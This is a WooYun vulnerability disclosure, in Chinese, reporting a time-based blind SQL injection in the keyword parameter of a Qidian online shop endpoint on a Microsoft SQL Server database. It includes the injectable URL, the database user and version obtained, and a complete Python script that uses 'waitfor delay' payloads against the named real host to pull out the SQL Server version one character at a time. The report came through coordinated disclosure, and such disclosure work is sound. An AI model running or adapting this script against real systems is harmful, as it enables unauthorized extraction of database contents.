当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082802

漏洞标题:起点中文网一处MSSQL注射(附验证脚本)

相关厂商:盛大网络

漏洞作者: lijiejie

提交时间:2014-11-10 18:13

修复时间:2014-12-25 18:14

公开时间:2014-12-25 18:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-11: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向核心白帽子及相关领域专家公开
2014-12-01: 细节向普通白帽子公开
2014-12-11: 细节向实习白帽子公开
2014-12-25: 细节向公众公开

简要描述:

起点中文网某站点一处MSSQL注射(附验证脚本)

详细说明:

注入点,起点商城:

GET http://shop.qidian.com/ajax/StoreHandler.ashx?Method=loadstoreitem&pageindex=1&r=0.7435916543472558&sorttype=0&cate=-1&keyword=aaa


参数keyword可注入。MSSQL time blind。

漏洞证明:

system_user: 

qidianadmin


猜解@@version,得到:

Microsoft SQL Server 2005


qidian_MSSQLi_1.png


附猜解脚本:

import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Start to retrive SQL Server Version:'
user = ''
for i in range(1,25):
    for payload in payloads:
        timeout_count = 0
        for j in range(1,3):
            try:
                conn = httplib.HTTPConnection('shop.qidian.com', timeout=5)
                random.seed()
                keyword = str(random.random()) + "fasfa'); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- "  % (i, ord(payload))
                start_time = time.time()
                conn.request(method='GET',
                             url= '/ajax/StoreHandler.ashx?Method=loadstoreitem&pageindex=1&r=0.7435916543472558&sorttype=0&cate=-1&keyword=' + urllib.quote(keyword),
                             headers = headers)
                conn.getresponse()
                conn.close()
                print '.',
                break
            except:
                timeout_count += 1
        if timeout_count == 2:    # 2 times to confirm
            user += payload
            print '[Scan In Progress]', user 
            break
print '\n[Done], SQL Server version is', user

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-11 17:29

厂商回复:

谢谢报告!洞主有心了!但是还没提到有啥数据。

最新状态:

暂无